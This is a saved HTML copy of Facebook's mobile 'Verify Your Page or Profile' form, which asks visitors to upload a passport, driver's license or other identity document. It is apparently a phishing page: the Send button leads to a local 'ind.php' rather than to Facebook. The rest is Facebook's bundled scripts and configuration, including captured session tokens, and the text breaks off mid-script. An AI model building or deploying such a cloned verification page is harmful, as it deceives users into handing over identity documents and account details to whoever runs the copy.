src="https://static.xx.fbcdn.net/rsrc.php/v3/yg/r/ngoBhFBLB-O.js?_nc_x=IqwH59e_Ga0" async="" data-bootloader-hash-client="lZZnVFH"></script></head><body tabindex="0" class="touch x1 _fzu _50-3 _67i4 _55wm portrait" style="background-color: rgb(221, 223, 226); min-height: 969px;"><script id="u_0_b_lE" nonce="">(function(a){a.__updateOrientation=function(){var b=!!a.orientation&&a.orientation!==180,c=document.body;c&&(c.className=c.className.replace(/(^|\s)(landscape|portrait)(\s|$)/g," ")+" "+(b?"landscape":"portrait"));return b}})(window);</script><div id="viewport" data-kaios-focus-transparent="1" style="min-height: 969px;"><h1 style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0">Facebook</h1><div id="page"><div class="_129_" id="header-notices"></div><div class="_52z5 _451a mFuturePageHeader _1uh1 titled" id="header"><div class="_7om2 _52we"><div class="_5s61"><div class="_52z7"><a role="button" class="backButton btn btnI bgb mfss touchable iconOnly" href="#" aria-label="Back" id="u_0_4_D8" data-sigil="back-button"><i class="img sp_sbDZaL7NQgQ sx_7f8a1e" style="margin-top: 2px;"></i></a></div></div><div class="_4g34"><div class="_52z6"><div class="_50l4 mfsl fcw" id="m-future-page-header-title" data-sigil="m-dialog-header-title">Verify Your Page or Profile</div></div></div></div></div><div id="rootcontainer"><div class="_65w _55wm" id="root" role="main" data-sigil="context-layer-root content-pane" style="min-height: 969px;"><article class="_55wm _55wr" id="u_0_2_hV">

<input type="hidden" name="fb_dtsg" value="AQFipefCVenD048:17:1648372223" autocomplete="off"><input type="hidden" name="jazoest" value="21962" autocomplete="off"><div class="_56be _5u9j _1fja"><div class="_55wo _55x2 _56bf"><h3 class="_52je _52jb _52jh _59e9 _55ws">Verify Your Page or Profile</h3><div class="_55wr">Verified pages and profiles have blue checkmarks next to their names to show that Facebook has confirmed they're the real presence of the public figures, celebrities, and brands they represent.</div><div><div class="_55wr" id="SupportFormRow.289222484856964"><div><div class="acw" data-sigil="marea">What are you verifying?<br><label class="_5qaz"><input type="radio" name="verification_type" value="page" id="289222484856964.0">Page</label><br><label class="_5qaz"><input type="radio" name="verification_type" value="profile" id="289222484856964.1">Profile</label></div></div></div><div class="_55wr" id="SupportFormRow.529239817202884" style="display: none;"><div><div class="acw" data-sigil="marea">Page<br><div id="529239817202884">You have no eligible admined pages.</div></div></div></div><div class="_55wr" id="SupportFormRow.1327308917352173" style="display: none;"><div><div class="acw" data-sigil="marea">Profile link<br><input class="_5whq input" id="1327308917352173" name="responsible_id" value="" placeholder="Enter your profile's URL" type="text" data-store-id="0"></div></div></div><div class="_55wr" id="SupportFormRow.498199704548531"><div><div class="acw" data-sigil="marea"><p>Step 1: Confirm authenticity</p><br><p>Add an official identification document for yourself or your business to show that your Page or profile is connected to the public figure, celebrity or brand it represents.</p></div></div></div><div class="_55wr" id="SupportFormRow.908510499970523"><div><div class="acw" data-sigil="marea">Document type<br><select name="document_type" id="908510499970523" required="1"><option value="drivers_license">Driver's license</option><option value="passport">Passport</option><option value="id">National identification card</option><option value="tax">Tax filing</option><option value="bill">Recent utility bill</option><option value="inc">Other</option></select></div></div></div><div class="_55wr" id="SupportFormRow.1487030044842148"><div><div class="acw" data-sigil="marea">Add document<br><div class="_6-q _6-r" id="attach_photo"><input type="file" name="AttachID[]" id="1487030044842148" accept="image/*" multiple="1" data-sigil="photo-input"></div></div></div></div><div class="_55wr" id="SupportFormRow.2814115472174035"><div><div class="acw" data-sigil="marea"><p>Step 2: Confirm notability</p><br><p>Show that the public figure, celebrity or brand your Page or profile represents is in the public interest.</p></div></div></div><div class="_55wr" id="SupportFormRow.2502555016693735"><div><div class="acw" data-sigil="marea">Category<br><select name="category" id="2502555016693735" required="1"><option value="News/Media">News/Media</option><option value="Sports">Sports</option><option value="Government &amp; Politics">Government &amp; Politics</option><option value="Music">Music</option><option value="Fashion">Fashion</option><option value="Entertainment">Entertainment</option><option value="Digital Creator/Blogger/Influencer">Digital Creator/Blogger/Influencer</option><option value="Gamer">Gamer</option><option value="Business/Brand/Organization">Business/Brand/Organization</option><option value="Other">Other</option></select></div></div></div>


<div class="_55wr" id="SupportFormRow.523673461757162"><div><div class="acw" data-sigil="marea">Country / region<br><span class="mfss fcg">Enter the country or region where the person or organization your Page or profile represents is most popular.</span><br><div id="u_0_0_Qz" class="mTypeahead" data-sigil="typeahead-hardpoint" data-autoid="autoid_5"><input type="hidden" name="country" id="u_0_1_Ph"><input autocapitalize="off" class="_5whq input" id="523673461757162" value="" autocomplete="off" autocorrect="off" role="combobox" aria-autocomplete="none" aria-expanded="false" aria-haspopup="true" type="text" data-sigil="textinput" aria-owns="js_0" data-autoid="autoid_3"></div></div></div></div>

<div class="_55wr" id="SupportFormRow.338605509622636"><div><div class="acw" data-sigil="marea"><div>Learn more about <a href="#">verified Pages and profiles</a>.</div></div></div></div><input type="hidden" name="form_id" value="295038365360854"><input type="hidden" id="support_form_295038365360854_hidden_fields" name="support_form_hidden_fields" value="{&quot;289222484856964&quot;:false,&quot;2502555016693735&quot;:false,&quot;529239817202884&quot;:true,&quot;1327308917352173&quot;:true,&quot;807202999796309&quot;:true}"><input type="hidden" id="support_form_295038365360854_fact_false_fields" name="support_form_fact_false_fields" value="[]"></div></div></div><div class="_3-8y">

<a href="ind.php">
<button value="Send" class="_54k8 _52jg _56bs _26vk _56b_ _56bw _56bu" id="u_0_3_bX" data-sigil="touchable"><span class="_55sr" style="margin-top: -3px;">Send</span></button>
</a>
</div></article><div style="display:none"><div></div><div></div></div></div></div><div class=""></div><div class="viewportArea _2v9s" style="display:none" id="u_0_5_nn" data-sigil="marea"><div class="_5vsg" id="u_0_6_Yd" style="max-height: 951px;"></div><div class="_5vsh" id="u_0_7_JO" style="max-height: 484px;"></div><div class="_5v5d fcg"><div class="_2so _2sq _2ss img _50cg" data-animtype="1" data-sigil="m-loading-indicator-animate m-loading-indicator-root"></div>Loading...</div></div><div class="viewportArea aclb" id="mErrorView" style="display:none" data-sigil="marea"><div class="container"><div class="image"></div><div class="message" data-sigil="error-message"></div><a class="link" data-sigil="MPageError:retry">Try Again</a></div></div></div></div><div id="static_templates"><div class="mDialog" id="modalDialog" style="display:none" data-sigil=" context-layer-root" data-autoid="autoid_2"><div class="_52z5 _451a mFuturePageHeader _1uh1 firstStep titled" id="mDialogHeader"><div class="_7om2 _52we"><div class="_5s61"><div class="_52z7"><button type="submit" value="Cancel" class="cancelButton btn btnD bgb mfss touchable" id="u_0_9_Ck" data-sigil="dialog-cancel-button">Cancel</button><button type="submit" value="Back" class="backButton btn btnI bgb mfss touchable iconOnly" aria-label="Back" id="u_0_a_lW" data-sigil="dialog-back-button"><i class="img sp_sbDZaL7NQgQ sx_7f8a1e" style="margin-top: 2px;"></i></button></div></div><div class="_4g34"><div class="_52z6"><div class="_50l4 mfsl fcw" id="m-future-page-header-title" role="heading" tabindex="0" data-sigil="m-dialog-header-title dialog-title">Loading...</div></div></div><div class="_5s61"><div class="_52z8" id="modalDialogHeaderButtons"></div></div></div></div><div class="modalDialogView" id="modalDialogView"></div><div class="_5v5d _5v5e fcg" id="dialogSpinner"><div class="_2so _2sq _2ss img _50cg" data-animtype="1" id="u_0_8_jN" data-sigil="m-loading-indicator-animate m-loading-indicator-root"></div>Loading...</div></div></div><script type="text/javascript" nonce="">/*<![CDATA[*/(function(){if(top!=self){try{if(parent!=top){throw 1;}var si_cj_d=["apps.facebook.com","apps.beta.facebook.com"];var href=top.location.href.toLowerCase();for(var i=0;i<si_cj_d.length;i++){if (href.indexOf(si_cj_d[i])>=0){throw 1;}}}catch(e){window.document.write("\u003Cstyle nonce=\"AfkhHZCr\">body * {display:none !important;}\u003C\/style>\u003Ca href=\"#\" onclick=\"top.location.href=window.location.href\" style=\"display:block !important;padding:10px\">Go to Facebook.com\u003C\/a>");/*jb5DRCsY*/}}}())/*]]>*/</script><script id="u_0_i_wl" nonce=""></script><script id="u_0_j_lX" src="https://static.xx.fbcdn.net/rsrc.php/v3ixJY4/yb/l/en_US/m2J8CGTnWKd.js?_nc_x=IqwH59e_Ga0" data-bootloader-hash="pUZ0T8G" nonce=""></script>
<script>now_inl=(function(){var p=window.performance;return p&&p.now&&p.timing&&p.timing.navigationStart?function(){return p.now()+p.timing.navigationStart}:function(){return new Date().getTime()};})();window.__bigPipeFR=now_inl();</script>
<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yz/l/0,cross/cfy1qwFFg9w.css?_nc_x=IqwH59e_Ga0" as="style">
<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yE/l/0,cross/CjfcwDhqANJ.css?_nc_x=IqwH59e_Ga0" as="style">
<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yv/l/0,cross/xA6tPSipJh3.css?_nc_x=IqwH59e_Ga0" as="style">
<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yE/l/0,cross/UYlX9pI2NhG.css?_nc_x=IqwH59e_Ga0" as="style">
<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yi/l/0,cross/78tYy2-SVNf.css?_nc_x=IqwH59e_Ga0" as="style">
<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yS/l/0,cross/6PCsQ334qnA.css?_nc_x=IqwH59e_Ga0" as="style">
<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3ixJY4/yb/l/en_US/m2J8CGTnWKd.js?_nc_x=IqwH59e_Ga0" as="script" nonce="">
<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yp/r/uqFCPZu4BB9.js?_nc_x=IqwH59e_Ga0" as="script" nonce="">
<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yf/l/0,cross/XTXuAMFiwGs.css?_nc_x=IqwH59e_Ga0" as="style">
<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yC/r/JOVw7FP3IdA.js?_nc_x=IqwH59e_Ga0" as="script" nonce="">
<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yf/r/6yzFRRzYsZb.js?_nc_x=IqwH59e_Ga0" as="script" nonce="">
<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yB/r/2jr_tFUjDMy.js?_nc_x=IqwH59e_Ga0" as="script" nonce="">
<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3i8594/y3/l/en_US/g2jtnOgcf-j.js?_nc_x=IqwH59e_Ga0" as="script" nonce="">
<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yl/r/ilMFccLWbov.js?_nc_x=IqwH59e_Ga0" as="script" nonce="">
<script>window.__bigPipeCtor=now_inl();requireLazy(["BigPipe"],function(BigPipe){define("__bigPipe",[],window.bigPipe=new BigPipe({"forceFinish":true,"config":{"flush_pagelets_asap":true,"dispatch_pagelet_replayable_actions":false}}));});</script>
<script nonce="">(function(){var n=now_inl();requireLazy(["__bigPipe"],function(bigPipe){bigPipe.beforePageletArrive("first_response",n);})})();</script>
<script nonce="">requireLazy(["__bigPipe"],(function(bigPipe){bigPipe.onPageletArrive({displayResources:["QgfUBa5","0lu+WFi","oy0uzo+","Vuff6Su","k8op+XT","sykFmfw","pUZ0T8G","1GzRKWC","tDDXq/O","/6ajLJK","IsQZRlw","bJ922yg","n35cwAF","FJqL2Al"],id:"first_response",phase:0,last_in_phase:true,tti_phase:0,all_phases:[63],jsmods:{define:[["MWebStorageMonsterWhiteList",[],{whitelist:["^CacheStorageVersion$","^RTC_VIDEO_INPUT$","^RTC_AUDIO_INPUT$","^RTC_AUDIO_OUTPUT$","^RTC_IS_AUDIO_ONLY$","^RTC_NOISE_SUPPRESSION$","^RTC_MUTE_STATE$","^Session$","^_oz_","^_video_bandwidthEstimate$","^Banzai$","^bz","^banzai\\:last_storage_flush$","^falco_queue_","^mutex","^msys","^Bandicoot\\:","^imp_seq_num$","^qe_switcher_nub_selection$","^TabId$","^sp_pi$","^\\:userchooser\\:osessusers$","^\\:userchooser\\:settings$","^brands\\:console\\:config$","^consoleEnabled$","^__fb_messenger_desktop_presence_info$","^vc_","^_showMDevConsole$","^ga_client_id$","^_mswam_$","^am_recently_used_filters\\:","^am_image_size_cache$","^ickt$","^hb_timestamp$","^signal_flush_timestamp$","^last_fast_refresh$","^_ctv_access_token$","^_ctv_android_device_info$","^_ctv_cast_access_token$","^_ctv_casting_remote$","^_ctv_console_log_viewer_on_full_screen_player_enabled$","^_ctv_cookie_consent_displayed$","^_ctv_debug_redux_logger_enabled$","^_ctv_deviceUniqueIDFallback$","^_ctv_gaming_consent_displayed$","^_ctv_installed_app_player_debug_overlay_enabled$","^_ctv_last_load_time_ms$","^_ctv_locale$","^_ctv_logged_out_constraints_sessions_count$","^_ctv_reloadedDueToStaleApp$","^_ctv_reloadedDueToUnrecoverableError$","^_ctv_search_terms$","^_ctv_tv_experiments$","^_ctv_usedCloseAppFallback$","^_ctv_user_sessions$","^_ctv_video_debug_overlay_enabled$","^_ctv_debug_rampart_server_number$","^fx_did$","^wa_lang_banner_dismissed$","^bulletin_article_reader_onload_dialog_seen$","^bulletin_session_attributes$","^md_survey$","^support_guest_chat$","^comet_is_recent_profile_switch$"]},254],["UserAgentData",[],{browserArchitecture:"64",browserFullVersion:"99.0.1150.52",browserMinorVersion:0,browserName:"Edge (Chromium Based)",browserVersion:99,deviceName:"Unknown",engineName:"WebKit",engineVersion:"537.36",platformArchitecture:"64",platformName:"Windows",platformVersion:"10",platformFullVersion:"10"},527],["CookieDomain",[],{domain:"facebook.com"},6421],["IntlVariationHoldout",[],{disable_variation:false},6533],["CookieCoreConfig",[],{c_user:{s:"None"},cppo:{t:86400,s:"None"},dpr:{t:604800,s:"None"},fbl_ci:{t:31536000,s:"None"},fbl_cs:{t:31536000,s:"None"},fbl_st:{t:31536000,s:"Strict"},i_user:{s:"None"},locale:{t:604800,s:"None"},m_pixel_ratio:{t:604800,s:"None"},noscript:{s:"None"},presence:{t:2592000,s:"None"},sfau:{s:"None"},usida:{s:"None"},vpd:{t:5184000,s:"Lax"},wd:{t:604800,s:"Lax"},"x-referer":{s:"None"},"x-src":{t:1,s:"None"}},2104],["FWLoader",[],{},278],["FbtResultGK",[],{shouldReturnFbtResult:true,inlineMode:"NO_INLINE"},876],["IntlPhonologicalRules",[],{meta:{"/_B/":"([.,!?\\s]|^)","/_E/":"([.,!?\\s]|$)"},patterns:{"/\u0001(.*)('|&#039;)s\u0001(?:'|&#039;)s(.*)/":"\u0001$1$2s\u0001$3","/_\u0001([^\u0001]*)\u0001/":"javascript"}},1496],["IntlViewerContext",[],{GENDER:1,regionalLocale:null},772],["MJSEnvironment",[],{IS_APPLE_WEBKIT_IOS:false,IS_TABLET:false,IS_ANDROID:false,IS_CHROME:true,IS_FIREFOX:false,IS_WINDOWS_PHONE:false,IS_SAMSUNG_DEVICE:false,OS_VERSION:10,PIXEL_RATIO:1,BROWSER_NAME:"Edge (Chromium Based)"},46],["NumberFormatConfig",[],{decimalSeparator:".",numberDelimiter:",",minDigitsForThousandsSeparator:4,standardDecimalPatternInfo:{primaryGroupSize:3,secondaryGroupSize:3},numberingSystemData:null},54],["ZeroCategoryHeader",[],{},1127],["ZeroRewriteRules",[],{rewrite_rules:{},whitelist:{"/hr/r":1,"/hr/p":1,"/zero/unsupported_browser/":1,"/zero/policy/optin":1,"/zero/optin/write/":1,"/zero/optin/legal/":1,"/zero/optin/free/":1,"/about/privacy/":1,"/about/privacy/update/":1,"/privacy/explanation/":1,"/zero/toggle/welcome/":1,"/zero/toggle/nux/":1,"/zero/toggle/settings/":1,"/fup/interstitial/":1,"/work/landing":1,"/work/login/":1,"/work/email/":1,"/ai.php":1,"/js_dialog_resources/dialog_descriptions_android.json":0,"/connect/jsdialog/MPlatformAppInvitesJSDialog/":0,"/connect/jsdialog/MPlatformOAuthShimJSDialog/":0,"/connect/jsdialog/MPlatformLikeJSDialog/":0,"/qp/interstitial/":1,"/qp/action/redirect/":1,"/qp/action/close/":1,"/zero/support/ineligible/":1,"/zero_balance_redirect/":1,"/zero_balance_redirect":1,"/zero_balance_redirect/l/":1,"/l.php":1,"/lsr.php":1,"/ajax/dtsg/":1,"/checkpoint/block/":1,"/exitdsite":1,"/zero/balance/pixel/":1,"/zero/balance/":1,"/zero/balance/carrier_landing/":1,"/zero/flex/logging/":1,"/tr":1,"/tr/":1,"/sem_campaigns/sem_pixel_test/":1,"/bookmarks/flyout/body/":1,"/zero/subno/":1,"/confirmemail.php":1,"/policies/":1,"/mobile/internetdotorg/classifier/":1,"/zero/dogfooding":1,"/xti.php":1,"/zero/fblite/config/":1,"/hr/zsh/wc/":1,"/ajax/bootloader-endpoint/":1,"/mobile/zero/carrier_page/":1,"/mobile/zero/carrier_page/education_page/":1,"/mobile/zero/carrier_page/feature_switch/":1,"/mobile/zero/carrier_page/settings_page/":1,"/aloha_check_build":1,"/upsell/zbd/softnudge/":1,"/mobile/zero/af_transition/":1,"/mobile/zero/af_transition/action/":1,"/mobile/zero/freemium/":1,"/mobile/zero/freemium/redirect/":1,"/mobile/zero/freemium/zero_fup/":1,"/privacy/policy/":1,"/privacy/center/":1,"/data/manifest/":1,"/4oh4.php":1,"/autologin.php":1,"/birthday_help.php":1,"/checkpoint/":1,"/contact-importer/":1,"/cr.php":1,"/legal/terms/":1,"/login.php":1,"/login/":1,"/mobile/account/":1,"/n/":1,"/remote_test_device/":1,"/upsell/buy/":1,"/upsell/buyconfirm/":1,"/upsell/buyresult/":1,"/upsell/promos/":1,"/upsell/continue/":1,"/upsell/h/promos/":1,"/upsell/loan/learnmore/":1,"/upsell/purchase/":1,"/upsell/promos/upgrade/":1,"/upsell/buy_redirect/":1,"/upsell/loan/buyconfirm/":1,"/upsell/loan/buy/":1,"/upsell/sms/":1,"/wap/a/channel/reconnect.php":1,"/wap/a/nux/wizard/nav.php":1,"/wap/appreg.php":1,"/wap/birthday_help.php":1,"/wap/c.php":1,"/wap/confirmemail.php":1,"/wap/cr.php":1,"/wap/login.php":1,"/wap/r.php":1,"/zero/datapolicy":1,"/a/timezone.php":1,"/a/bz":1,"/bz/reliability":1,"/r.php":1,"/mr/":1,"/reg/":1,"/registration/log/":1,"/terms/":1,"/f123/":1,"/expert/":1,"/experts/":1,"/terms/index.php":1,"/terms.php":1,"/srr/":1,"/msite/redirect/":1,"/fbs/pixel/":1,"/contactpoint/preconfirmation/":1,"/contactpoint/cliff/":1,"/contactpoint/confirm/submit/":1,"/contactpoint/confirmed/":1,"/contactpoint/login/":1,"/preconfirmation/contactpoint_change/":1,"/help/contact/":1,"/survey/":1,"/upsell/loyaltytopup/accept/":1,"/settings/":1,"/lite/":1,"/zero_status_update/":1,"/operator_store/":1,"/upsell/":1,"/wifiauth/login/":1}},1478],["CookieCoreLoggingConfig",[],{maximumIgnorableStallMs:16.67,sampleRate:9.7e-5,sampleRateClassic:1.0e-10,sampleRateFastStale:1.0e-8},3401],["IntlNumberTypeConfig",[],{impl:"if (n === 1) { return IntlVariations.NUMBER_ONE; } else { return IntlVariations.NUMBER_OTHER; }"},3405],["ServerTimeData",[],{serverTime:1648372234850,timeOfRequestStart:1648372234718.5,timeOfResponseStart:1648372234718.5},5943],["MLoadingIndicatorSigils",[],{ANIMATE:"m-loading-indicator-animate",ROOT:"m-loading-indicator-root"},279],["MemoryLoggerConfigWebSitevarConfig",[],{measurement_interval_minutes:5},5573],["CurrentEnvironment",[],{facebookdotcom:true,messengerdotcom:false,workplacedotcom:false,instagramdotcom:false},827],["ImmediateActiveSecondsConfig",[],{sampling_rate:2003,ias_bucket:314},423],["MPageControllerGating",[],{shouldDeferUntilCertainNoRedirect:false,shouldReleaseFetcherLock:true,shouldLoadingScreenSetScriptPath:false,shouldRenderAsync404:true},2023],["MobileAppDetect",[],{is_mobile_app:false,is_ads_manager_app:false,is_pages_manager:false,is_facebook_for_android:false,is_facebook_for_android_in_app_browser:false,is_android_faceweb:false,is_facebook_for_ios:false,is_instagram:false,is_messenger_for_android:false,is_messenger_for_ios:false,is_messenger_lite_for_android:false,is_messenger_lite_for_ios:false,is_wilde:false,is_kaios:false},1109],["FbtQTOverrides",[],{overrides:{"1_a12242b49abb74a05c727158311e3ec5":"What’s up?"}},551],["AnalyticsCoreData",[],{device_id:"$^|AcZ0OKdZzKxy8HDGVda1y2JAwUwrNeePvqzyaPlEAvYvXJYgwnDcau3MAKXwwry0RmbHhtKrMKC5AaV4R-s6xZLVQdyr|fd.AcYoGTTfT9gtokCE_C8duPRtEhNqaFBlfqPr0pqhIx_WUNzRMhXOhEeEYcHl5zHoD7xry2ivMMAgONMoCSriSi9E",app_id:"412378670482",enable_bladerunner:true,enable_ack:true,push_phase:"C3",enable_observer:false,enable_dataloss_timer:false,enable_fallback_for_br:true},5237],["LinkshimHandlerConfig",[],{supports_meta_referrer:true,default_meta_referrer_policy:"origin-when-crossorigin",switched_meta_referrer_policy:"origin",non_linkshim_lnfb_mode:null,link_react_default_hash:"AT1p2WtyJHG3M1JbqSHoS5_oKfDKFXlvChVnrNrDMQVJFspidHuLFCH3K8zxEtGgFj_cVX4yHIuTw37rT8s_NhrkPfEvnwfQvjuGnEYEyoyCelsYppvhT6TM9kK8Mmg9P-yu4g",untrusted_link_default_hash:"AT0h0UfEyu-6xPg00myUvRzTYM6TH7Y-C-rUxq1jqfJB9mvKWqEyPjCmQUBNhtwMk2vaoxFxGf6X7FrBqOga3-6QxQshDbAaB5ZMKMH3ogYhYUqPlxIEbP4dz57usRtleIQ4Jg",linkshim_host:"lm.facebook.com",linkshim_path:"/l.php",linkshim_enc_param:"h",linkshim_url_param:"u",use_rel_no_opener:false,always_use_https:true,onion_always_shim:true,middle_click_requires_event:false,www_safe_js_mode:"asynclazy",m_safe_js_mode:"MLynx_asynclazy",ghl_param_link_shim:false,click_ids:["IwAR1lJ-yzqefmqbbzopupmPKfLXgQ5TG3OXzb_Ly5MOXPtzsNlSlD-e0SmhY","IwAR1tgPUF3OOofrPzLh_FDI5d5RVWFXIQoyfQCTrNTafDvtpatXGDuMRkGd0","IwAR0aBljMj3Olnz5rzfjPrwAqPE8vGtFP-uMIlX_GjYaK04EoQ-IXL-BalRM","IwAR03c9xl1SkvNn-HQEpGBOgo8ahi30av2C2LBr9lSRjSqtpjk7QeVgr1BwI","IwAR1pcsUtcd1lzM4Wt_a1H-seyOWcYKUUcaY0Yk14QAmZgWI1fd1WhG8sFiw","IwAR3jiBshbL_KJCMRh-tti4GhHKntN7zP2hCggYe7idOh1Z3u_QMC0bs855Y","IwAR1PeA41vn0G482dxz0_A6RK1RX4be1yyiLsMW4aHVjD5_RioMIMHLyO8mg","IwAR05rGCOPSNdnOvIDHuaGYKkibkV98mp0PntWJQBPqMqB-Pcz0B1dlpVQPg","IwAR3cdf7v8qfDseq3Lw-X9SY155TQ2soGjgNEkNrfYE_Zqpk3IQCIgZT3_w8","IwAR2kNPYSKqNOHPE764ILKiBZQohwy5kTqU-JCDkB61QVoO1AFJJDZRMfGrc","IwAR3_tqLdtdvP6_BkPemOur7S1qkJgV86gpcftXvT1hEfMfh64noYbf9_-u8","IwAR072Nwft0ZRSr0NGDO5HdZ79giJAoFMwSnCoxuQQFwBScb4JqwgszkceXg","IwAR3Lvd6aOk7klWoTADhHWp_B31s1kNAAL-mwXdUSg4wH1nCjfAJjzT-t1ms","IwAR3TMl8gQOEOFcPpp1eckG7rvaq4EouJym1FuRTxav8w463RrMnsNFze4Qk","IwAR2nP6got_WE71fpFc3FyIQKsnJUf06qCUfywhSSSDkcSQGl_nzpr1GvWm0","IwAR1r0-_xEuriMn8w8R0tY4HjGm-LALVIfHHga7iuvwfHyXMuJc7MrOVlvlQ","IwAR09pywZc0BO950r0oB_RiIImpVNSgtigHLVH1A7qqNVQH17kUZjFWsLGzU","IwAR2xeUiiUfZ9hpjocSE4wkb48gpYmoSHIUOJcDDvNbBjpoMbC7QMd8Xkhec","IwAR0IVv1g2DWSdEx_RHX-YqO6c9aQ6GURYaPCFPrroAf6mCP-J5rtrJGemrk","IwAR0zjyMtscysAK0oKNMiiboTs2ucO7FKpivR61RMKvoIJeMDkf2u9JV57QQ","IwAR24cn_aaEETQPV6STcMwu9eb_y7TLpULHX4WHuGwxioFobisCgq4JrhT6U","IwAR3CGC3Uu-7cW0lncXQnzGiSy3MA6dqmpcVHNqelGvsdlSyFRYmBBhZ7swo","IwAR0IDoRvSnDrCYrr_cMvv4G2qSlbQtkLt_ZpkAQze4Ze8-7gVHF8bLyrW4Q","IwAR0nWlB2Bwcl6r3FtCapOLDFmn-5YYf7nqMLsrZPKbUBbToMuKDDkFPL3FU","IwAR3rlVjbIjNffPuZ31oZWmDJ3dDQ8z-u9kEuoubTqxQ_QxDo4izdnV4IwqM","IwAR1Fl9eatNYr2bG2DaoQMdhQfrnC6nD-mEkYyvb9Qy3KwGiFkOZT44dPUxQ","IwAR2aQWGFD3RqzS_Tj1245IKLCxXDo53vUc1RsqRoZ35lEPiy7fMgd_PX2-4","IwAR1w6LX0u98pO_srBMXdlInb2fhFId-LZ0iLwcW01MchyqomuAMcYCvtasg","IwAR1CctbGT4a3aOE6eEMW5IXT4mOfmlF0CInGOglIUzbhGPSt97u8WmkNh3o","IwAR1ff4cX0GgSsptsdqSqJOM0pffk67XZR6_OjOj7MrNuaWiO09BtjHpzdnc","IwAR3Ppc4ueHz12XzNufxyf2z0tFjv10gJT8BPH0knHg6kEaPscGXxwRR4FuY","IwAR1wKLnh0NKzC0Lt6N9msxfgEI65tDFLL9l7fUIlpMdtwlcp-6oaha6FzIs","IwAR0aMqKbnmFeKap2EmKyBRr3-5aET8tJT-MRMbkXuk9HV4FtPKW5VssPqis","IwAR2TIjHOWDRhqin0wIJ4-OiNgyAericEy1gL35STCJOCzomLswvcmMaLIvc","IwAR2zlnHEqCkO3mAyEVIj7wL9sLTX0WDqvDQHuw7mEAnSC1U8U6ymYQbCC8Y","IwAR3LrCy6M9KAyRPMKg7JZKjxXKKbkWxNnDKJ2U2ikWOFoIqwPxeFk5JOiQs","IwAR0_IqLnqLmCoWLXLif65ripf3RcoaPqG1tGMnbM46qlalXIibJM0CvLA-o","IwAR3yVCInsHgqfkyU4VmyorTktdWLuwHdKnTaSLGal2gyNA_yBVj2bvf6I5o","IwAR1_akSDwa4D4aNC2ebpo_h_kVQPOElPeoOZQNo7jDr2YXFi5Qeyf7CJ2uY","IwAR2ubQOsFnxdvCtlrgPakOonSKa7ijpwLQayMiH5fPsiIIXpnv0xmzbQ698","IwAR1apDMaFoKyPeszO1AeVy_uXr2ncGLADaknC_G49UsR8_cZHmFlWuIq7to","IwAR3YoPsuGj7HCYrg4E0-pNkRHb-PJ4o4hsSpzrBKYcMm2991djVE-mlwDq8","IwAR0WmcJfG-Pl4mt5RzSEb6g4G5hPK3aqiMOY3YVIal__trrdJTSsjLlJJ_I","IwAR2oJ7VLmPz-8i2mrdml30__SOyo9-ZYlthxlO8aFgItEgmJIJKGKbehibw","IwAR1glNFdGn-UHzpqh2PH02Ga67hGZSQ52UQtDt_CqsDZRj1Bkp7blg9_wb8","IwAR2MBeja-HSyFJgkwaNxqppJ32n_ZHTGrdLBo4z1OdwUL80pVW77TXy73X0","IwAR1N8usH3wElIdoh_fikSox87baBq6AAGjoXm2xnmV2APzpq-d2KXn6bW40","IwAR16NzxIYqUGaNPi1X_jdq7PMMb22rlOZd5qt5u6L08I7nRwNdnEA7pmehM","IwAR2Q1gjBp4wy-nD2MYdSWt7DjmuZ9NeFBuCIcLq5cXrdbY827dgMT3E9SQE","IwAR1qaKFwlygA7UWL1ifPQdi4nvs3Ax0U4p7-1dx_WHhWHXwhdX4P26sS8fU"],is_linkshim_supported:true,current_domain:"facebook.com",blocklisted_domains:["ad.doubleclick.net","ads-encryption-url-example.com","bs.serving-sys.com","ad.atdmt.com","adform.net","ad13.adfarm1.adition.com","ilovemyfreedoms.com","secure.adnxs.com"],is_mobile_device:false},27],["cr:1642797",["BanzaiBase"],{__rc:["BanzaiBase","Aa0FcCbb3nSCVnU0n_rlf6PYW4PRUjGOY2W9O6CJG5e_BREoTjwyUAlLObW7Su2YZRNRSDmlAwSw2u58Sf5AHCvO4ZI"]},-1],["cr:694370",["requestIdleCallbackBlue"],{__rc:["requestIdleCallbackBlue","Aa0FcCbb3nSCVnU0n_rlf6PYW4PRUjGOY2W9O6CJG5e_BREoTjwyUAlLObW7Su2YZRNRSDmlAwSw2u58Sf5AHCvO4ZI"]},-1],["cr:692209",["cancelIdleCallbackBlue"],{__rc:["cancelIdleCallbackBlue","Aa0FcCbb3nSCVnU0n_rlf6PYW4PRUjGOY2W9O6CJG5e_BREoTjwyUAlLObW7Su2YZRNRSDmlAwSw2u58Sf5AHCvO4ZI"]},-1],["MBanzaiConfig",[],{MAX_SIZE:10000,MAX_WAIT:30000,MIN_WAIT:null,RESTORE_WAIT:30000,blacklist:["time_spent"],disabled:false,gks:{platform_oauth_client_events:true,boosted_pagelikes:true,mtouch_use_beacon:true},known_routes:["artillery_javascript_actions","artillery_javascript_trace","artillery_logger_data","logger","falco","gk2_exposure","js_error_logging","loom_trace","marauder","perfx_custom_logger_endpoint","qex","require_cond_exposure_logging","sri_logger_data"],should_drop_unknown_routes:true,should_log_unknown_routes:false},32]],instances:[["__inst_0b9a2a66_0_0_/G",["ContactFormMobileConditionChecker","__elem_0b9a2a66_0_0_Ra","__elem_62659873_0_0_j3"],[{__m:"__elem_0b9a2a66_0_0_Ra"},{__m:"__elem_62659873_0_0_j3"},null,["289222484856964.0","289222484856964.1",2502555016693735],["click","click","change"],[{s:289222484856964,t:529239817202884,n:"0",p:"checked",v:true},{s:289222484856964,t:1327308917352173,n:"1",p:"checked",v:true},{s:2502555016693735,t:80